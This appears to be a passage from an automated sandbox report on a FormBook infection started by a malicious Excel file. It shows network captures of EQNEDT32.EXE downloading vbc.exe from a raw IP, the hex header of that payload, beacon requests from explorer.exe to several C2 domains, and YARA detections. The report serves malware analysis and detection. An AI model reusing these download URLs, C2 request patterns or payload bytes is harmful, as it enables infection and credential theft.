                                                   Nov 25, 2021 18:12:13.689333916 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689369917 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689385891 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689409971 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689420938 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689449072 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689461946 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689490080 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689507961 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689532995 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689553976 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689570904 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689580917 CET  49167     80        192.168.2.22    192.210.173.90
                                                   Nov 25, 2021 18:12:13.689610004 CET  80        49167     192.210.173.90  192.168.2.22
                                                   Nov 25, 2021 18:12:13.689610958 CET  49167     80        192.168.2.22    192.210.173.90

                                                  UDP Packets

                                                   Timestamp                            Src Port  Dst Port  Source IP     Dest IP
                                                   Nov 25, 2021 18:13:29.634049892 CET  52167     53        192.168.2.22  8.8.8.8
                                                   Nov 25, 2021 18:13:29.655356884 CET  53        52167     8.8.8.8       192.168.2.22
                                                   Nov 25, 2021 18:13:34.947618008 CET  50591     53        192.168.2.22  8.8.8.8
                                                   Nov 25, 2021 18:13:35.128479004 CET  53        50591     8.8.8.8       192.168.2.22
                                                   Nov 25, 2021 18:13:40.503207922 CET  57805     53        192.168.2.22  8.8.8.8
                                                   Nov 25, 2021 18:13:40.709136963 CET  53        57805     8.8.8.8       192.168.2.22
                                                   Nov 25, 2021 18:13:46.443938971 CET  59030     53        192.168.2.22  8.8.8.8
                                                   Nov 25, 2021 18:13:46.498696089 CET  53        59030     8.8.8.8       192.168.2.22

                                                  DNS Queries

                                                   Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                  Type            Class
                                                   Nov 25, 2021 18:13:29.634049892 CET  192.168.2.22  8.8.8.8  0x439c    Standard query (0)  www.promtgloan.com    A (IP address)  IN (0x0001)
                                                   Nov 25, 2021 18:13:34.947618008 CET  192.168.2.22  8.8.8.8  0x8eb8    Standard query (0)  www.yhxt13800.com     A (IP address)  IN (0x0001)
                                                   Nov 25, 2021 18:13:40.503207922 CET  192.168.2.22  8.8.8.8  0xc18c    Standard query (0)  www.clicktoreach.com  A (IP address)  IN (0x0001)
                                                   Nov 25, 2021 18:13:46.443938971 CET  192.168.2.22  8.8.8.8  0xfc43    Standard query (0)  www.ff4cu6twc.xyz     A (IP address)  IN (0x0001)

                                                  DNS Answers

                                                   Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                  CName           Address          Type                    Class
                                                   Nov 25, 2021 18:13:29.655356884 CET  8.8.8.8    192.168.2.22  0x439c    No error (0)  www.promtgloan.com    promtgloan.com  -                CNAME (Canonical name)  IN (0x0001)
                                                   Nov 25, 2021 18:13:29.655356884 CET  8.8.8.8    192.168.2.22  0x439c    No error (0)  promtgloan.com        -               34.102.136.180   A (IP address)          IN (0x0001)
                                                   Nov 25, 2021 18:13:35.128479004 CET  8.8.8.8    192.168.2.22  0x8eb8    No error (0)  www.yhxt13800.com     -               154.205.233.189  A (IP address)          IN (0x0001)
                                                   Nov 25, 2021 18:13:40.709136963 CET  8.8.8.8    192.168.2.22  0xc18c    No error (0)  www.clicktoreach.com  -               156.234.44.48    A (IP address)          IN (0x0001)
                                                   Nov 25, 2021 18:13:46.498696089 CET  8.8.8.8    192.168.2.22  0xfc43    No error (0)  www.ff4cu6twc.xyz     ff4cu6twc.xyz   -                CNAME (Canonical name)  IN (0x0001)
                                                   Nov 25, 2021 18:13:46.498696089 CET  8.8.8.8    192.168.2.22  0xfc43    No error (0)  ff4cu6twc.xyz         -               23.225.139.107   A (IP address)          IN (0x0001)

                                                  HTTP Request Dependency Graph

                                                  • 192.210.173.90
                                                  • www.promtgloan.com
                                                  • www.yhxt13800.com
                                                  • www.clicktoreach.com

                                                  HTTP Packets

                                                   Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
                                                   0           192.168.2.22  49167        192.210.173.90  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

                                                   Timestamp                            kBytes transferred  Direction  Data
                                                   Nov 25, 2021 18:12:12.974230051 CET  0                   OUT        GET /70007/vbc.exe HTTP/1.1
                                                  Accept: */*
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: 192.210.173.90
                                                  Connection: Keep-Alive
                                                   Nov 25, 2021 18:12:13.155354977 CET  1                   IN         HTTP/1.1 200 OK
                                                  Date: Thu, 25 Nov 2021 17:12:13 GMT
                                                  Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
                                                  Last-Modified: Wed, 24 Nov 2021 09:28:50 GMT
                                                  ETag: "4a7bd-5d1857c59b117"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 305085
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cd cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 84 02 00 00 04 00 00 e3 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 03 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 74 00 00 b4 00 00 00 00 70 03 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 5b 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c 12 00 00 00 70 00 00 00 14 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 5c 02 00 00 90 00 00 00 04 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 70 03 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELH\0p@tpp.texth[\ `.rdatap`@@.dataX\t@.ndata.rsrcpx@@


                                                  Session ID: 1 | Source IP: 192.168.2.22 | Source Port: 49168 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                  Timestamp: Nov 25, 2021 18:13:29.812628031 CET | kBytes transferred: 323 | Direction: OUT | Data:
                                                  GET /m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw== HTTP/1.1
                                                  Host: www.promtgloan.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Timestamp: Nov 25, 2021 18:13:29.930166006 CET | kBytes transferred: 324 | Direction: IN | Data:
                                                  HTTP/1.1 403 Forbidden
                                                  Server: openresty
                                                  Date: Thu, 25 Nov 2021 17:13:29 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 275
                                                  ETag: "6192576c-113"
                                                  Via: 1.1 google
                                                  Connection: close
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                  Session ID: 2 | Source IP: 192.168.2.22 | Source Port: 49169 | Destination IP: 154.205.233.189 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                  Timestamp: Nov 25, 2021 18:13:35.307363987 CET | kBytes transferred: 324 | Direction: OUT | Data:
                                                  GET /m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVA HTTP/1.1
                                                  Host: www.yhxt13800.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Timestamp: Nov 25, 2021 18:13:35.485795021 CET | kBytes transferred: 326 | Direction: IN | Data:
                                                  HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Thu, 25 Nov 2021 17:13:43 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 2025
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 d0 c2 d3 e0 c7 bd c6 cc bb e1 d5 b9 b7 fe ce f1 d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 36 38 3b 26 23 32 36 34 31 32 3b 26 23 32 30 32 33 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 32 36 33 36 38 3b 26 23 32 32 38 32 33 3b 26 23 33 30 33 34 30 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 36 38 3b 26 23 32 36 34 31 32 3b 26 23 32 30 32 33 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 32 36 33 36 38 3b 26 23 32 32 38 32 
33 3b 26 23 33 30 33 34 30 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 32 35 30 38 3b 26 23 32 31 35 31 32 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 31 39 39 36 38 3b 26 23 32 36 34 31 32 3b 26 23 32 30 32 33 34 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 34 34 3b 26 23 32 36 33 36 38 3b 26 23 32 36 30 33 32 3b 26 23 32 36 33 36 38 3b 26 23 32 32 38 32 33 3b 26 23 33 30 33 34 30 3b 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 36 35 3b 26 23 38 36 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 32 37 34 33 31 3b 26 23
                                                  Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20122;&#27954;&#32508;&#21512;&#20037;&#20037;&#19968;&#26412;&#20234;&#19968;&#21306;&#44;&#26368;&#26032;&#26368;&#22823;&#30340;&#20122;&#27954;&#65;&#86;&#32593;&#31449;&#44;&#22312;&#32447;&#35266;&#30475;&#20813;&#36153;&#22269;&#20135;&#27431;&#32654;&#19968;&#21306;&#44;&#20037;&#20037;&#32508;&#21512;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;</title><meta name="keywords" content="&#20122;&#27954;&#32508;&#21512;&#20037;&#20037;&#19968;&#26412;&#20234;&#19968;&#21306;&#44;&#26368;&#26032;&#26368;&#22823;&#30340;&#20122;&#27954;&#65;&#86;&#32593;&#31449;&#44;&#22312;&#32447;&#35266;&#30475;&#20813;&#36153;&#22269;&#20135;&#27431;&#32654;&#19968;&#21306;&#44;&#20037;&#20037;&#32508;&#21512;&#19968;&#21306;&#20108;&#21306;&#19977;&#21306;" /><meta name="description" content="&#20122;&#27954;&#32508;&#21512;&#20037;&#20037;&#19968;&#26412;&#20234;&#19968;&#21306;&#44;&#26368;&#26032;&#26368;&#22823;&#30340;&#20122;&#27954;&#65;&#86;&#32593;&#31449;&#44;&#22312;&#32447;&#35266;&#30475;&#20813;&#36153;&#22269;&#20135;&#27431;&#


                                                  Session ID: 3 | Source IP: 192.168.2.22 | Source Port: 49171 | Destination IP: 156.234.44.48 | Destination Port: 80 | Process: C:\Windows\explorer.exe
                                                  Timestamp: Nov 25, 2021 18:13:40.957479000 CET | kBytes transferred: 327 | Direction: OUT | Data:
                                                  GET /m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA== HTTP/1.1
                                                  Host: www.clicktoreach.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Timestamp: Nov 25, 2021 18:13:41.200989008 CET | kBytes transferred: 328 | Direction: IN | Data:
                                                  HTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Thu, 25 Nov 2021 17:13:41 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA==
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Code Manipulations

                                                  Statistics

                                                  Behavior


                                                  System Behavior

                                                  General

                                                  Start time:18:11:17
                                                  Start date:25/11/2021
                                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                  Imagebase:0x13f3b0000
                                                  File size:28253536 bytes
                                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:11:39
                                                  Start date:25/11/2021
                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                  Imagebase:0x400000
                                                  File size:543304 bytes
                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  General

                                                  Start time:18:11:42
                                                  Start date:25/11/2021
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\Public\vbc.exe"
                                                  Imagebase:0x400000
                                                  File size:305085 bytes
                                                  MD5 hash:1624595E2354FF7BE9E7DC6DEF2ED69E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.465187885.0000000000510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:18:11:44
                                                  Start date:25/11/2021
                                                  Path:C:\Users\Public\vbc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\Public\vbc.exe"
                                                  Imagebase:0x400000
                                                  File size:305085 bytes
                                                  MD5 hash:1624595E2354FF7BE9E7DC6DEF2ED69E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.527141411.00000000023C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.525306169.0000000000560000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.463047286.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.463706165.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.525208793.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.464395143.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  General

                                                  Start time:18:11:47
                                                  Start date:25/11/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0xffa10000
                                                  File size:3229696 bytes
                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.494095380.00000000095A5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.487044128.00000000095A5000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  General

                                                  Start time:18:12:10
                                                  Start date:25/11/2021
                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
